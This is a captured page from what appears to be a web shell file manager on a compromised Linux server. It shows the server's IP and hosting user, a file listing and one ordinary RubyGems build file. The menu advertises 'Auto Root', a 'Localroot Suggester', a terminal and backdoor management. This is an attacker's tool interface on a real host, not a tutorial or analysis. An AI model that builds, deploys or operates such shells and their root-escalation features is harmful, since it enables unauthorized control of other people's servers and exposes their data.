Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
rubygems /
rubygems /
ext /
Delete
Unzip
Name
Size
Permission
Date
Action
cargo_builder
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
build_error.rb
179
B
-rw-r--r--
2026-04-07 17:22
builder.rb
6.97
KB
-rw-r--r--
2026-04-07 17:22
cargo_builder.rb
9.98
KB
-rw-r--r--
2026-04-07 17:22
cmake_builder.rb
472
B
-rw-r--r--
2026-04-07 17:22
configure_builder.rb
567
B
-rw-r--r--
2026-04-07 17:22
ext_conf_builder.rb
2.15
KB
-rw-r--r--
2026-04-07 17:22
rake_builder.rb
918
B
-rw-r--r--
2026-04-07 17:22
Save
Rename
# frozen_string_literal: true class Gem::Ext::CmakeBuilder < Gem::Ext::Builder def self.build(extension, dest_path, results, args=[], lib_dir=nil, cmake_dir=Dir.pwd) unless File.exist?(File.join(cmake_dir, "Makefile")) require_relative "../command" cmd = ["cmake", ".", "-DCMAKE_INSTALL_PREFIX=#{dest_path}", *Gem::Command.build_args] run cmd, results, class_name, cmake_dir end make dest_path, results, cmake_dir results end end